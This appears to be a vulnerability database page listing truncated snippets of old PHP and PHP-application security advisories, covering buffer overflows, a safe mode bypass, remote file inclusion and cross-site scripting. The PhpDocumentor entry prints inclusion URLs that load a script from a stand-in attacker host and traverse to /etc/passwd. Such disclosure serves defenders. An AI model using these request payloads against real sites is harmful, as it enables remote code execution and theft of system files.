PT-2006-4865 · Php +1 · Php +1

Name of the Vulnerable Software and Affected Versions: PHP versions 4.4.3 and earlier PHP versions 5.1.4 and earlier Description: The issue allows context-dependent attackers to execute arbitrary code via a sscanf PHP function call that performs argument swapping. This can trigger a buffer...

security flaw

zendhashdelkeyorindex in zendhash.c in PHP before 4.4.3 and 5.x before 5.1.3 can cause zendhashdel to delete the wrong element, which prevents a variable from being unset even when the PHP unset function is called, which might cause the variable's value to be used in security-relevant operations...

error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 errorlog Safe Mode Bypass PHP 5.1.4 and 4.4.2 Author: Maksymilian Arciemowicz cXIb8O3 Date: - -Written: 10.6.2006 - -Public: 26.06.2006 from SECURITYREASON.COM CVE-2006-3011 - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of i...

PHPKIT >= 1.6.1r2 arbitrary local/remote inclusion (unproperly patched in previous versions)

---------- PHPKit = v.1.6.1 release 2 remote code execution ------------------- software: site: www.phpkit.de description: a Content Management / homepage / community building software written in PHP language --------------------------------------------------------------------------------...

phpdocumentor_130rc4_incl_expl.txt

---- PhpDocumentor also, if magicquotesgpc off: http://target/pathtophpdocumentor/Documentation/tests/bug-559668.php?FORUMLIB=http://attacker/script.txt%00 http://target/pathtophpdocumentor/Documentation/tests/bug-559668.php?FORUMLIB=../../../../../../../etc/passwd%00...

PhpDocumentor <= 1.3.0 rc4 Arbitrary remote/local inclusion

---- PhpDocumentor = 1.3.0 rc4 Arbitrary remote/local inclusion --- software: site: http://www.phpdoc.org/ description: "phpDocumentor, sometimes referred to as phpdoc or phpdocu, is the current standard auto-documentation tool for the php language. Similar to Javadoc, and written in php,...

security flaw

The deserialization code in PHP before 4.3.10 and PHP 5.x up to 5.0.2 allows remote attackers to cause a denial of service and execute arbitrary code via untrusted data to the unserialize function that may trigger "information disclosure, double-free and negative reference index array underflow"...

athena.txt

Language: PHP Script: Athena Version: 0.1a Official website: http://sourceforge.net/projects/athena Problem: Remote file inclusion Discovered by: beford & GB Description: =========== A simple website management system written in oo php that uses a mysql database to store user and group rights and...

jelsoftvb.txt

Vendor : Jelsoft Enterprises URL : http://www.vbulletin.com Version : vBulletin 3.0.0 RC4 && Others Risk : Cross Site Scripting Description: vBulletin is a powerful, scalable and fully customisable forums package for your web site. Based on the PHP language, backed with a blisteringly fast MySQL...

BSA-2016-006

Summary Security Advisory ID : BSA-2016-006 Component : PHP Revision : 3.0 N/A...